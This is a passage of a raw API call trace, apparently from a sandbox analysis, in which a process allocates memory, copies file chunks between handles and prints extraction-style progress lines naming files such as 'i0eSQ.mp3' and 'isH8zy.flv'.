(_Block=0xb5fb40) [0072.261] malloc (_Size=0x4) returned 0xb5fb40 [0072.261] free (_Block=0xb5fc40) [0072.261] malloc (_Size=0x4) returned 0xb5fc40 [0072.261] free (_Block=0xb5fc70) [0072.261] malloc (_Size=0x4) returned 0xb5fc70 [0072.261] free (_Block=0xb5fb50) [0072.261] malloc (_Size=0x20) returned 0x784518 [0072.262] free (_Block=0x780340) [0072.262] malloc (_Size=0x4) returned 0xb5fb50 [0072.262] free (_Block=0xb5fc20) [0072.262] malloc (_Size=0x4) returned 0xb5fc20 [0072.262] free (_Block=0xb5fa90) [0072.262] malloc (_Size=0x10) returned 0xb5f5c0 [0072.262] free (_Block=0xb5f578) [0072.262] malloc (_Size=0x4) returned 0xb5fa90 [0072.262] free (_Block=0xb5fac0) [0072.262] malloc (_Size=0xc) returned 0xb5f578 [0072.262] malloc (_Size=0x24) returned 0x787ef0 [0072.262] malloc (_Size=0x10) returned 0xb5f5d8 [0072.262] free (_Block=0xb5f5a8) [0072.262] malloc (_Size=0x40) returned 0x784278 [0072.262] free (_Block=0x781fb0) [0072.262] free (_Block=0x787e00) [0072.262] free (_Block=0xb5f668) [0072.262] malloc (_Size=0x4) returned 0xb5fac0 [0072.262] malloc (_Size=0x20) returned 0x784540 [0072.262] malloc (_Size=0x8) returned 0xb5fb30 [0072.262] malloc (_Size=0x18) returned 0x780340 [0072.263] malloc (_Size=0x18) returned 0x7805c0 [0072.263] malloc (_Size=0x4e) returned 0x785618 [0072.263] malloc (_Size=0x8) returned 0xb5fab0 [0072.263] malloc (_Size=0x4) returned 0xb5fad0 [0072.263] free (_Block=0x0) [0072.263] malloc (_Size=0x20) returned 0x784568 [0072.263] malloc (_Size=0x8) returned 0xb5fc80 [0072.263] malloc (_Size=0x18) returned 0x7805e0 [0072.263] malloc (_Size=0x18) returned 0x780600 [0072.263] malloc (_Size=0x4e) returned 0x785670 [0072.263] free (_Block=0xb5fab0) [0072.263] malloc (_Size=0x8) returned 0xb5fab0 [0072.263] GetTickCount () returned 0x1149760 [0072.263] strlen (_Str="0") returned 0x1 [0072.263] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#0", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0072.264] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#0", cchWideChar=2, lpMultiByteStr=0x7812d0, cbMultiByte=2, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="#0 \r", lpUsedDefaultChar=0x5ae8d4) returned 2 [0072.264] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.264] fputs (in: _Str=" 0% = #0", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.265] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.265] free (_Block=0xb5fab0) [0072.265] malloc (_Size=0x8) returned 0xb5fab0 [0072.265] GetTickCount () returned 0x1149760 [0072.266] free (_Block=0xb5fab0) [0072.266] SetFilePointer (in: hFile=0x80, lDistanceToMove=32, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x20 [0072.266] malloc (_Size=0x28) returned 0x787e00 [0072.266] malloc (_Size=0x28) returned 0x787f20 [0072.266] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.266] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0xfe40, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0xfe40, lpOverlapped=0x0) returned 1 [0072.268] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0xfe40, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0xfe40, lpOverlapped=0x0) returned 1 [0072.270] GetTickCount () returned 0x1149770 [0072.270] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.271] free (_Block=0x787f20) [0072.271] free (_Block=0x787e00) [0072.271] malloc (_Size=0x18) returned 0x780700 [0072.271] malloc (_Size=0x4) returned 0xb5fab0 [0072.271] free (_Block=0x0) [0072.271] malloc (_Size=0x34) returned 0x786690 [0072.271] malloc (_Size=0xa) returned 0xb5f668 [0072.271] malloc (_Size=0x8) returned 0xb5fca0 [0072.271] free (_Block=0x0) [0072.271] malloc (_Size=0x4) returned 0xb5fc50 [0072.271] free (_Block=0x0) [0072.271] malloc (_Size=0x8) returned 0xb5fa80 [0072.271] free (_Block=0x0) [0072.271] malloc (_Size=0x8) returned 0xb5fc90 [0072.271] free (_Block=0x0) [0072.271] malloc (_Size=0x10) returned 0xb5f5a8 [0072.271] free (_Block=0xb5fc90) [0072.272] malloc (_Size=0x4) returned 0xb5fc90 [0072.272] free (_Block=0x0) [0072.272] malloc (_Size=0x8) returned 0x780ac0 [0072.272] malloc (_Size=0x22) returned 0x787e00 [0072.272] free (_Block=0x780ac0) [0072.272] malloc (_Size=0x6) returned 0x780ac0 [0072.272] free (_Block=0xb5fb40) [0072.272] malloc (_Size=0x6) returned 0xb5fb40 [0072.272] free (_Block=0xb5fc40) [0072.272] malloc (_Size=0x6) returned 0xb5fc40 [0072.272] free (_Block=0xb5fc70) [0072.272] malloc (_Size=0x30) returned 0x781fb0 [0072.272] free (_Block=0x784518) [0072.272] malloc (_Size=0x6) returned 0xb5fc70 [0072.272] free (_Block=0xb5fb50) [0072.272] malloc (_Size=0x6) returned 0xb5fb50 [0072.272] free (_Block=0xb5fc20) [0072.272] malloc (_Size=0x18) returned 0x780720 [0072.272] free (_Block=0xb5f5c0) [0072.272] malloc (_Size=0x6) returned 0xb5fc20 [0072.272] free (_Block=0xb5fa90) [0072.272] malloc (_Size=0xc) returned 0xb5f5c0 [0072.273] malloc (_Size=0x22) returned 0x787f20 [0072.273] malloc (_Size=0x18) returned 0x780740 [0072.273] free (_Block=0xb5f5d8) [0072.273] malloc (_Size=0x60) returned 0x785390 [0072.273] free (_Block=0x784278) [0072.273] free (_Block=0x787e00) [0072.273] malloc (_Size=0x8) returned 0xb5fa90 [0072.273] GetTickCount () returned 0x1149770 [0072.273] free (_Block=0xb5fa90) [0072.273] malloc (_Size=0x8) returned 0xb5fa90 [0072.273] GetTickCount () returned 0x1149770 [0072.273] free (_Block=0xb5fa90) [0072.273] SetFilePointer (in: hFile=0x80, lDistanceToMove=65120, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0xfe60 [0072.273] malloc (_Size=0x28) returned 0x787e00 [0072.273] malloc (_Size=0x28) returned 0x787f50 [0072.273] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.274] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x5860, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x5860, lpOverlapped=0x0) returned 1 [0072.274] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x5860, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x5860, lpOverlapped=0x0) returned 1 [0072.275] GetTickCount () returned 0x1149770 [0072.275] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.276] free (_Block=0x787f50) [0072.276] free (_Block=0x787e00) [0072.276] malloc (_Size=0x18) returned 0x780760 [0072.276] malloc (_Size=0x8) returned 0xb5fa90 [0072.276] free (_Block=0xb5fab0) [0072.276] malloc (_Size=0x34) returned 0x7866d0 [0072.276] malloc (_Size=0xa) returned 0xb5f5d8 [0072.276] malloc (_Size=0x8) returned 0xb5fab0 [0072.276] free (_Block=0x0) [0072.276] malloc (_Size=0x4) returned 0x780af0 [0072.276] free (_Block=0x0) [0072.276] malloc (_Size=0x10) returned 0xb5f5f0 [0072.276] free (_Block=0xb5fa80) [0072.276] malloc (_Size=0x18) returned 0x780780 [0072.276] free (_Block=0xb5f5a8) [0072.277] malloc (_Size=0x20) returned 0x784518 [0072.277] free (_Block=0x780780) [0072.277] malloc (_Size=0x8) returned 0xb5fa80 [0072.277] free (_Block=0xb5fc90) [0072.277] malloc (_Size=0x8) returned 0xb5fc90 [0072.277] malloc (_Size=0x24) returned 0x787e00 [0072.277] free (_Block=0xb5fc90) [0072.277] malloc (_Size=0xc) returned 0xb5f5a8 [0072.277] malloc (_Size=0x24) returned 0x787f50 [0072.277] free (_Block=0x787e00) [0072.277] malloc (_Size=0x8) returned 0xb5fc90 [0072.277] GetTickCount () returned 0x1149770 [0072.277] free (_Block=0xb5fc90) [0072.277] malloc (_Size=0x8) returned 0xb5fc90 [0072.277] GetTickCount () returned 0x1149770 [0072.277] free (_Block=0xb5fc90) [0072.277] SetFilePointer (in: hFile=0x80, lDistanceToMove=87744, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x156c0 [0072.277] malloc (_Size=0x28) returned 0x787e00 [0072.278] malloc (_Size=0x28) returned 0x787f80 [0072.278] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.278] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x17db0, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x17db0, lpOverlapped=0x0) returned 1 [0072.281] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x17db0, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x17db0, lpOverlapped=0x0) returned 1 [0072.284] GetTickCount () returned 0x1149770 [0072.284] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.286] free (_Block=0x787f80) [0072.286] free (_Block=0x787e00) [0072.286] malloc (_Size=0x18) returned 0x780780 [0072.286] malloc (_Size=0xc) returned 0xb5f608 [0072.286] free (_Block=0xb5fa90) [0072.286] malloc (_Size=0x34) returned 0x786710 [0072.286] malloc (_Size=0xa) returned 0xb5f620 [0072.286] malloc (_Size=0x8) returned 0xb5fa90 [0072.286] free (_Block=0x0) [0072.286] malloc (_Size=0x4) returned 0xb5fc90 [0072.286] free (_Block=0x0) [0072.286] malloc (_Size=0x18) returned 0x7807a0 [0072.287] free (_Block=0xb5f5f0) [0072.287] malloc (_Size=0x30) returned 0x781e28 [0072.287] free (_Block=0x784518) [0072.287] malloc (_Size=0xc) returned 0xb5f5f0 [0072.287] free (_Block=0xb5fa80) [0072.287] malloc (_Size=0x8) returned 0xb5fa80 [0072.287] malloc (_Size=0x18) returned 0x7807c0 [0072.287] free (_Block=0xb5fa80) [0072.287] malloc (_Size=0x8) returned 0xb5fa80 [0072.287] free (_Block=0x780ac0) [0072.287] malloc (_Size=0x8) returned 0x780ac0 [0072.287] free (_Block=0xb5fb40) [0072.287] malloc (_Size=0x8) returned 0xb5fb40 [0072.287] free (_Block=0xb5fc40) [0072.287] malloc (_Size=0x40) returned 0x784278 [0072.287] free (_Block=0x781fb0) [0072.288] malloc (_Size=0x8) returned 0xb5fc40 [0072.288] free (_Block=0xb5fc70) [0072.288] malloc (_Size=0x8) returned 0xb5fc70 [0072.288] free (_Block=0xb5fb50) [0072.288] malloc (_Size=0x20) returned 0x784518 [0072.288] free (_Block=0x780720) [0072.288] malloc (_Size=0x8) returned 0xb5fb50 [0072.288] free (_Block=0xb5fc20) [0072.288] malloc (_Size=0xc) returned 0xb5f638 [0072.288] malloc (_Size=0x18) returned 0x780720 [0072.288] malloc (_Size=0x20) returned 0x784590 [0072.288] free (_Block=0x780740) [0072.288] malloc (_Size=0x80) returned 0x7878d8 [0072.288] free (_Block=0x785390) [0072.288] free (_Block=0x7807c0) [0072.288] malloc (_Size=0x8) returned 0xb5fc20 [0072.289] GetTickCount () returned 0x114977f [0072.289] free (_Block=0xb5fc20) [0072.289] malloc (_Size=0x8) returned 0xb5fc20 [0072.289] GetTickCount () returned 0x114977f [0072.289] free (_Block=0xb5fc20) [0072.289] SetFilePointer (in: hFile=0x80, lDistanceToMove=185456, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x2d470 [0072.289] malloc (_Size=0x28) returned 0x787e00 [0072.289] malloc (_Size=0x28) returned 0x787f80 [0072.289] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.289] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x16770, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x16770, lpOverlapped=0x0) returned 1 [0072.294] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x16770, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x16770, lpOverlapped=0x0) returned 1 [0072.298] GetTickCount () returned 0x114977f [0072.298] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.299] free (_Block=0x787f80) [0072.299] free (_Block=0x787e00) [0072.299] malloc (_Size=0x18) returned 0x7807c0 [0072.299] malloc (_Size=0x10) returned 0xb5f650 [0072.299] free (_Block=0xb5f608) [0072.299] malloc (_Size=0x34) returned 0x786750 [0072.299] malloc (_Size=0xa) returned 0xb5f608 [0072.299] malloc (_Size=0x8) returned 0xb5fc20 [0072.299] free (_Block=0x0) [0072.299] malloc (_Size=0x4) returned 0x780a80 [0072.300] free (_Block=0x0) [0072.300] malloc (_Size=0x20) returned 0x7845b8 [0072.300] free (_Block=0x7807a0) [0072.300] malloc (_Size=0x40) returned 0x788fd0 [0072.428] free (_Block=0x781e28) [0072.428] malloc (_Size=0x10) returned 0x789fd0 [0072.428] free (_Block=0xb5f5f0) [0072.428] malloc (_Size=0x8) returned 0x780c10 [0072.428] malloc (_Size=0x12) returned 0x7807a0 [0072.428] free (_Block=0x780c10) [0072.428] malloc (_Size=0xc) returned 0xb5f5f0 [0072.428] malloc (_Size=0x12) returned 0x780740 [0072.429] free (_Block=0x7807a0) [0072.429] malloc (_Size=0x8) returned 0x780c10 [0072.429] GetTickCount () returned 0x114980c [0072.429] free (_Block=0x780c10) [0072.429] malloc (_Size=0x8) returned 0x780c10 [0072.429] GetTickCount () returned 0x114980c [0072.429] free (_Block=0x780c10) [0072.429] SetFilePointer (in: hFile=0x80, lDistanceToMove=277760, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x43d00 [0072.429] malloc (_Size=0x28) returned 0x787e00 [0072.429] malloc (_Size=0x28) returned 0x787f80 [0072.429] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.429] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0xf090, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0xf090, lpOverlapped=0x0) returned 1 [0072.432] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0xf090, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0xf090, lpOverlapped=0x0) returned 1 [0072.434] GetTickCount () returned 0x114980c [0072.434] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.435] free (_Block=0x787f80) [0072.435] free (_Block=0x787e00) [0072.435] malloc (_Size=0x18) returned 0x7807a0 [0072.435] malloc (_Size=0x18) returned 0x7807e0 [0072.435] free (_Block=0xb5f650) [0072.435] malloc (_Size=0x34) returned 0x786790 [0072.435] malloc (_Size=0xa) returned 0xb5f650 [0072.435] malloc (_Size=0x8) returned 0x780c10 [0072.435] free (_Block=0x0) [0072.436] malloc (_Size=0x4) returned 0x780c00 [0072.436] free (_Block=0x0) [0072.436] malloc (_Size=0x30) returned 0x781e28 [0072.436] free (_Block=0x7845b8) [0072.436] malloc (_Size=0x58) returned 0x787960 [0072.436] free (_Block=0x788fd0) [0072.436] malloc (_Size=0x18) returned 0x780800 [0072.436] free (_Block=0x789fd0) [0072.436] malloc (_Size=0x8) returned 0x780c20 [0072.436] malloc (_Size=0x2a) returned 0x781fb0 [0072.436] free (_Block=0x780c20) [0072.436] malloc (_Size=0xb) returned 0x789fd0 [0072.436] free (_Block=0xb5fa80) [0072.436] malloc (_Size=0xb) returned 0x789fe8 [0072.436] free (_Block=0x780ac0) [0072.436] malloc (_Size=0xb) returned 0x78a000 [0072.437] free (_Block=0xb5fb40) [0072.437] malloc (_Size=0x58) returned 0x785390 [0072.437] free (_Block=0x784278) [0072.437] malloc (_Size=0xb) returned 0x78a018 [0072.437] free (_Block=0xb5fc40) [0072.437] malloc (_Size=0xb) returned 0x78a030 [0072.437] free (_Block=0xb5fc70) [0072.437] malloc (_Size=0x2c) returned 0x781fe8 [0072.437] free (_Block=0x784518) [0072.437] malloc (_Size=0xb) returned 0x78a048 [0072.437] free (_Block=0xb5fb50) [0072.437] malloc (_Size=0xc) returned 0x78a060 [0072.437] malloc (_Size=0x2a) returned 0x782020 [0072.437] malloc (_Size=0x2c) returned 0x782058 [0072.437] free (_Block=0x784590) [0072.438] malloc (_Size=0xb0) returned 0x7875f8 [0072.438] free (_Block=0x7878d8) [0072.438] free (_Block=0x781fb0) [0072.438] malloc (_Size=0x8) returned 0xb5fb50 [0072.438] GetTickCount () returned 0x114980c [0072.438] free (_Block=0xb5fb50) [0072.438] malloc (_Size=0x8) returned 0xb5fb50 [0072.438] GetTickCount () returned 0x114980c [0072.438] free (_Block=0xb5fb50) [0072.438] SetFilePointer (in: hFile=0x80, lDistanceToMove=339344, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x52d90 [0072.438] malloc (_Size=0x28) returned 0x787e00 [0072.438] malloc (_Size=0x28) returned 0x787f80 [0072.438] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.439] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x59f0, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x59f0, lpOverlapped=0x0) returned 1 [0072.440] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x59f0, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x59f0, lpOverlapped=0x0) returned 1 [0072.441] GetTickCount () returned 0x114981b [0072.441] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.442] free (_Block=0x787f80) [0072.442] free (_Block=0x787e00) [0072.442] malloc (_Size=0x18) returned 0x780820 [0072.442] malloc (_Size=0x34) returned 0x7867d0 [0072.442] malloc (_Size=0xa) returned 0x78a078 [0072.442] malloc (_Size=0x8) returned 0xb5fb50 [0072.442] free (_Block=0x0) [0072.442] malloc (_Size=0x4) returned 0xb5fc70 [0072.442] free (_Block=0x0) [0072.442] malloc (_Size=0x70) returned 0x7878d8 [0072.442] free (_Block=0x787960) [0072.442] malloc (_Size=0x8) returned 0xb5fc40 [0072.442] malloc (_Size=0x2c) returned 0x781fb0 [0072.442] free (_Block=0xb5fc40) [0072.442] malloc (_Size=0xc) returned 0x78a090 [0072.442] malloc (_Size=0x2c) returned 0x782090 [0072.443] free (_Block=0x781fb0) [0072.443] malloc (_Size=0x8) returned 0xb5fc40 [0072.443] GetTickCount () returned 0x114981b [0072.443] free (_Block=0xb5fc40) [0072.443] malloc (_Size=0x8) returned 0xb5fc40 [0072.443] GetTickCount () returned 0x114981b [0072.443] free (_Block=0xb5fc40) [0072.443] SetFilePointer (in: hFile=0x80, lDistanceToMove=362368, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x58780 [0072.443] malloc (_Size=0x28) returned 0x787e00 [0072.443] malloc (_Size=0x28) returned 0x787f80 [0072.443] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.443] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x11180, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x11180, lpOverlapped=0x0) returned 1 [0072.446] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x11180, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x11180, lpOverlapped=0x0) returned 1 [0072.448] GetTickCount () returned 0x114981b [0072.448] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.449] free (_Block=0x787f80) [0072.449] free (_Block=0x787e00) [0072.449] malloc (_Size=0x18) returned 0x78a3d0 [0072.449] malloc (_Size=0x20) returned 0x784590 [0072.450] free (_Block=0x7807e0) [0072.450] malloc (_Size=0x34) returned 0x786810 [0072.450] malloc (_Size=0xa) returned 0x78a0a8 [0072.450] malloc (_Size=0x8) returned 0xb5fc40 [0072.450] free (_Block=0x0) [0072.450] malloc (_Size=0x4) returned 0xb5fb40 [0072.450] free (_Block=0x0) [0072.450] malloc (_Size=0x40) returned 0x784278 [0072.450] free (_Block=0x781e28) [0072.450] malloc (_Size=0x20) returned 0x784518 [0072.450] free (_Block=0x780800) [0072.450] malloc (_Size=0x8) returned 0xb5fa80 [0072.450] malloc (_Size=0x2a) returned 0x781e28 [0072.450] free (_Block=0xb5fa80) [0072.450] malloc (_Size=0xc) returned 0x78a0c0 [0072.450] malloc (_Size=0x2a) returned 0x781fb0 [0072.450] free (_Block=0x781e28) [0072.451] malloc (_Size=0x8) returned 0xb5fa80 [0072.451] GetTickCount () returned 0x114981b [0072.451] free (_Block=0xb5fa80) [0072.451] malloc (_Size=0x8) returned 0xb5fa80 [0072.451] GetTickCount () returned 0x114981b [0072.451] free (_Block=0xb5fa80) [0072.451] SetFilePointer (in: hFile=0x80, lDistanceToMove=432384, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x69900 [0072.451] malloc (_Size=0x28) returned 0x787e00 [0072.451] malloc (_Size=0x28) returned 0x787f80 [0072.451] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.451] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x16f30, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x16f30, lpOverlapped=0x0) returned 1 [0072.456] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x16f30, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x16f30, lpOverlapped=0x0) returned 1 [0072.461] GetTickCount () returned 0x114982b [0072.461] strcmp (_Str1="=", _Str2="=") returned 0 [0072.461] strlen (_Str="18") returned 0x2 [0072.461] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0072.461] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=9, lpMultiByteStr=0x7812d0, cbMultiByte=9, lpDefaultChar=0x5ae8d8, lpUsedDefaultChar=0x5ae8c4 | out: lpMultiByteStr="i0eSQ.mp3 \r", lpUsedDefaultChar=0x5ae8c4) returned 9 [0072.461] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.582] fputs (in: _Str=" 18% = i0eSQ.mp3", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.583] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.583] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.584] free (_Block=0x787f80) [0072.584] free (_Block=0x787e00) [0072.584] malloc (_Size=0x18) returned 0x780800 [0072.584] malloc (_Size=0x34) returned 0x786850 [0072.584] malloc (_Size=0xa) returned 0x78a0d8 [0072.584] malloc (_Size=0x8) returned 0xb5fa80 [0072.584] free (_Block=0x0) [0072.585] malloc (_Size=0x4) returned 0x780ac0 [0072.585] free (_Block=0x0) [0072.585] malloc (_Size=0x90) returned 0x787950 [0072.585] free (_Block=0x7878d8) [0072.585] malloc (_Size=0x8) returned 0x780c20 [0072.585] malloc (_Size=0x14) returned 0x7807e0 [0072.585] free (_Block=0x780c20) [0072.585] malloc (_Size=0xe) returned 0x78a0f0 [0072.585] free (_Block=0x789fd0) [0072.585] malloc (_Size=0xe) returned 0x789fd0 [0072.585] free (_Block=0x789fe8) [0072.585] malloc (_Size=0xe) returned 0x789fe8 [0072.585] free (_Block=0x78a000) [0072.585] malloc (_Size=0x70) returned 0x7878d8 [0072.585] free (_Block=0x785390) [0072.586] malloc (_Size=0xe) returned 0x78a000 [0072.586] free (_Block=0x78a018) [0072.586] malloc (_Size=0xe) returned 0x78a018 [0072.586] free (_Block=0x78a030) [0072.586] malloc (_Size=0x38) returned 0x786890 [0072.586] free (_Block=0x781fe8) [0072.586] malloc (_Size=0xe) returned 0x78a030 [0072.586] free (_Block=0x78a048) [0072.586] malloc (_Size=0xc) returned 0x78a048 [0072.586] malloc (_Size=0x14) returned 0x78a3f0 [0072.586] malloc (_Size=0x38) returned 0x7868d0 [0072.586] free (_Block=0x782058) [0072.586] malloc (_Size=0xe0) returned 0x7876b0 [0072.587] strcmp (_Str1="=", _Str2="=") returned 0 [0072.587] strlen (_Str="18") returned 0x2 [0072.587] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#9", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0072.587] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#9", cchWideChar=2, lpMultiByteStr=0x7812d0, cbMultiByte=2, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="#9 \r", lpUsedDefaultChar=0x5ae8d4) returned 2 [0072.587] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.588] fputs (in: _Str=" 18% = #9", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.588] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.588] free (_Block=0x780c20) [0072.588] malloc (_Size=0x8) returned 0x780c20 [0072.588] GetTickCount () returned 0x11498a8 [0072.589] strcmp (_Str1="=", _Str2="=") returned 0 [0072.589] strlen (_Str="18") returned 0x2 [0072.589] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0072.589] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=10, lpMultiByteStr=0x7812d0, cbMultiByte=10, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="isH8zy.flv \r", lpUsedDefaultChar=0x5ae8d4) returned 10 [0072.589] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.589] fputs (in: _Str=" 18% = isH8zy.flv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.590] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.590] free (_Block=0x780c20) [0072.590] SetFilePointer (in: hFile=0x80, lDistanceToMove=526384, lpDistanceToMoveHigh=0x5ae9a4*=0, 